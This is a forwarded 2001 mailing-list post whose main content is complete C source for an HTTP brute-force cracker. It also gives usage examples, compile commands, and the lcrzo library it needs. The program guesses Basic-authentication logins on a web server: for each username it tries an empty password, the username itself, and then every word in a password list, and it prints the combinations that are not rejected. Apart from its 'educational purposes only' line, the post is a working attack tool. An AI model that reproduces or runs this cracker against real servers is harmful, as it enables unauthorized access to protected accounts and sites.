____________________________________________________________________
The solution lies in the heart of humankind.
Chris Lawson
The Armadillo Group ,::////;::-. James Choate
Austin, Tx /:'///// ``::>/|/ [EMAIL PROTECTED]
www.ssz.com .', |||| `/( e\ 512-451-7087
-====~~mm-'`-```-mm --'-
--------------------------------------------------------------------
---------- Forwarded message ----------
Date: Thu, 03 May 2001 07:40:48 +0200
From: Laurent INFOS <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: HTTP brute force cracker
/************************************************************
** HTTP brute force cracker **
************************************************************
When a directory on a website is protected by a basic
authentication, we have to enter a valid username/password
to get the page.
This program tries a list a logins and passwords.
For example, the file /tmp/userlist may contain (only a word
by line):
joe
webadm
marco
For example, the file /tmp/passlist may contain :
house
horse
flour
So, if we want to access to http://server:80/index.html,
we can use :
./httpgetbrute server 80 /index.html /tmp/userlist /tmp/passlist
This program prints result of the brute force.
The library lcrzo is needed :
http://www.laurentconstantin.com/us/lcrzo/ [main server]
http://go.to/laurentconstantin/us/lcrzo/ [backup server]
http://laurentconstantin.est-la.com/us/lcrzo/ [backup server]
To compile :
gcc -o httpgetbrute httpgetbrute.c -llcrzo -lpcap
This program is for educational purposes only.
*/
/* include the library headers */
#include <lcrzo.h>
#include <stdlib.h>
#include <stdio.h>
/*-------------------------------------------------------------*/
/* function declarations */
int http_get_brute(lcrzo_ipl ipl,
lcrzo_uint16 port,
lcrzo_conststring url,
lcrzo_conststring user,
lcrzo_conststring pass);
/*-------------------------------------------------------------*/
int main(int argc, char *argv[])
{ lcrzo_ipl ipl;
lcrzo_uint16 port;
lcrzo_data data;
lcrzo_string user, pass;
lcrzo_int32 datasize;
int fduser, fdpass;
if ( argc<6 )
{ /* print usage */
printf("Usage: %s server_name server_port url usernamesfile passwdsfile\n",
argv[0]);
printf("Example: %s 1.2.3.5 80 /index.html /tmp/userlist /tmp/passlist\n",
argv[0]);
puts("Files userlist and passlist should contain one entry per line.");
return(255);
}
/* initialize the needed variables */
lcrzo_epr(lcrzo_ipl_init_hs(argv[1], &ipl));
port=(lcrzo_uint16)atoi(argv[2]);
lcrzo_epr(lcrzo_fd_open_read(argv[4], &fduser));
/* read each line of the files */
while ( lcrzo_fd_readm_line(fduser, LCRZO_TRUE, &data, &datasize)
== LCRZO_ERR_OK )
{ user=data;
user[datasize]='\0';
/* first, try with pass=="" */
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, ""));
/* then, try with pass==login */
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, user));
/* then try each password of the file */
lcrzo_epr(lcrzo_fd_open_read(argv[5], &fdpass));
while ( lcrzo_fd_readm_line(fdpass, LCRZO_TRUE, &data, &datasize)
== LCRZO_ERR_OK )
{ pass=data;
pass[datasize]='\0';
lcrzo_epr(http_get_brute(ipl, port, argv[3], user, pass));
lcrzo_string_free(pass);
}
lcrzo_epr(lcrzo_fd_close(fdpass));
lcrzo_string_free(user);
}
/* close */
lcrzo_epr(lcrzo_fd_close(fduser));
return(LCRZO_ERR_OK);
}
/*-------------------------------------------------------------*/
int http_get_brute(lcrzo_ipl ipl,
lcrzo_uint16 port,
lcrzo_conststring url,
lcrzo_conststring user,
lcrzo_conststring pass)
{ static lcrzo_int32 numtest=0;
lcrzo_sock sock;
lcrzo_data data;
lcrzo_int32 datasize;
lcrzo_string logpass, integerstring, errormsg;
lcrzo_int16 errornumber;
lcrzo_regexp re;
int ret;
/* first, we generate the base64 of login:passwd */
lcrzo_epr(lcrzo_data_initm_text(user, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(":", datasize, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(pass, datasize, &data, &datasize));
lcrzo_epr(lcrzo_base64_initm_data(data, datasize, &logpass));
lcrzo_data_free(data);
/* open the connection */
lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));
/* construct the data to send*/
lcrzo_epr(lcrzo_data_initm_text("GET ", &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(url, datasize, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(" HTTP/1.0\r\n", datasize,
&data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text("Authorization: Basic ", datasize,
&data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text(logpass, datasize, &data, &datasize));
lcrzo_string_free(logpass);
lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
lcrzo_epr(lcrzo_data_appendm_text("\r\n", datasize, &data, &datasize));
/* write data to the socket */
/*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_DUMP));*/
lcrzo_epr(lcrzo_sock_write(sock, data, datasize));
lcrzo_data_free(data);
/* analyze the answer */
lcrzo_epr(lcrzo_sock_readm_line(&sock, LCRZO_TRUE, &data, &datasize));
/*lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_TEXTN));*/
ret=lcrzo_data_search_regexp(data, datasize, LCRZO_FALSE, +1, -1,
"HTTP/... ([0-9]+) (.+)", re);
if ( ret==LCRZO_ERR_OK )
{ /* get the error number */
lcrzo_epr(lcrzo_string_initm_range(data, re[1].startindex_positive,
re[1].endindex_positive,
&integerstring));
errornumber=atoi(integerstring);
lcrzo_string_free(integerstring);
/* print result */
if ( errornumber!=401 )
{ /* get the error message */
lcrzo_epr(lcrzo_string_initm_range(data, re[2].startindex_positive,
re[2].endindex_positive,
&errormsg));
printf("%s\t%s\t-> %d (%s)\n", user, pass, errornumber, errormsg);
lcrzo_string_free(errormsg);
}
else
{ numtest++;
if ((!(numtest%10)) || numtest<10) printf("%ld passwd tried\n", numtest);
}
}
else
{ puts("I could not understand this anwser :");
lcrzo_epr(lcrzo_data_print(data, datasize, LCRZO_PRINTTYPE_TEXTN));
}
lcrzo_data_free(data);
/* close */
lcrzo_epr(lcrzo_sock_close(sock));
return(LCRZO_ERR_OK);
}
